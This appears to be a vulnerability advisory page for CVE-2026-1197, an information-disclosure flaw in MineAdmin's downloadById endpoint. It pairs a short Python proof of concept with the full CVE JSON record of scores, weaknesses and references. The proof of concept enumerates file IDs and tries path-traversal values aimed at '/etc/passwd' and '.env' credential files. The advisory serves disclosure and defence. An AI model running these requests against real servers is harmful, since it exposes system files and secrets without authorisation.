CVE-2026-1197

import requests # CVE-2026-1197 PoC - MineAdmin Information Disclosure # Target: /system/downloadById endpoint target_url = "http://target-server/api/system/downloadById" # Test with different ID values to enumerate files test_ids = [1, 2, 3, 4, 5, "config", "../etc/passwd", "../../../.env"] for test_id in test_ids: params = {"id": test_id} headers = { "Authorization": "Bearer <low_privilege_token>", "User-Agent": "Mozilla/5.0" } try: response = requests.get(target_url, params=params, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] ID {test_id}: Possible file disclosure") print(f"Response headers: {response.headers}") print(f"Content preview: {response.text[:200]}") print("-" * 50) elif response.status_code == 403: print(f"[-] ID {test_id}: Access denied") else: print(f"[*] ID {test_id}: Status {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing ID {test_id}: {e}") print("\n[!] Note: This PoC requires a valid low-privilege authentication token")

{"cve": {"id": "CVE-2026-1197", "sourceIdentifier": "[email protected]", "published": "2026-01-20T01:15:56.620", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in MineAdmin 1.x/2.x. Affected by this vulnerability is an unknown functionality of the file /system/downloadById. Performing a manipulation of the argument ID results in information disclosure. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitation appears to be difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en MineAdmin 1.x/2.x. Afectada por esta vulnerabilidad es una funcionalidad desconocida del archivo /system/downloadById. Realizar una manipulación del argumento ID resulta en revelación de información. El ataque puede ser iniciado remotamente. La complejidad del ataque es calificada como alta. La explotación parece ser difícil. El exploit es ahora público y puede ser usado. El proveedor fue contactado tempranamente sobre esta revelación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A167C8E-5C7F-4192-8DD0-01444D06C9CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EED883D-2F40-4DE0-8816-8495146E06B6"}]}]}], "references": [{"url": "https://github.com/SourByte05/MineAdmin-Vulnerability/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341782", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341782", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.734274", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}